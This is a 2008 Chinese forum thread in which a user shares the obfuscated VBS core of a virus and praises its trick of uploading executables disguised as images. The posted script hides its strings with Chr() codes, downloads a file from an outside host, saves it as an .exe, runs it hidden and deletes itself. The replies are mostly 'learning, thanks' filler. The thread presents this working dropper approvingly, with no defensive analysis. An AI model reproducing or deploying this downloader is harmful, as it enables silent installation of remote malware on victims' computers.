9esu 2008-3-22 11:49 PM
从最新病毒中得到的病毒核心VBS脚本,给大家分享下
病毒位置:c:\windows\help\bai.VBS
这种技术太牛了,可以病毒放到任何网站上去,只要把扩展名该为jpg等一类合法的上传格式,利用该脚本再转换为exe格式
内容:[code]on error resume next
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/ttjj1/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINDOWS\help\bai.VBS",vbhide[/code]我将脚本转换了,大家看的方便些
**** Hidden Message *****
seeking 2008-3-29 11:47 AM
看看把,呵呵o(∩_∩)o...
tempeverything 2008-3-30 09:03 AM
看看,学习一下
谢谢楼主
gfooogf 2008-4-5 01:53 PM
看看,学习一下
谢谢楼主!@!!
weibo2757 2008-4-24 06:36 PM
yct13 yct13
redapple 2008-4-25 09:08 AM
看看,学习一下
谢谢楼主!@!!
fugq0fff 2008-5-4 11:20 PM
看看,学习一下
谢谢楼主
ningxpsny 2008-5-10 02:50 PM
回复一个先,看看什么样的
qrd8008 2008-5-12 08:29 PM
看一下。。不过看不懂
fengyin 2008-6-8 02:38 AM
哎呀
一个脚本,可是不知道怎么用啊
huanghai1986 2008-6-8 03:50 PM
yct05 yct05 yct05 yct05 yct05 yct05 yct05 yct05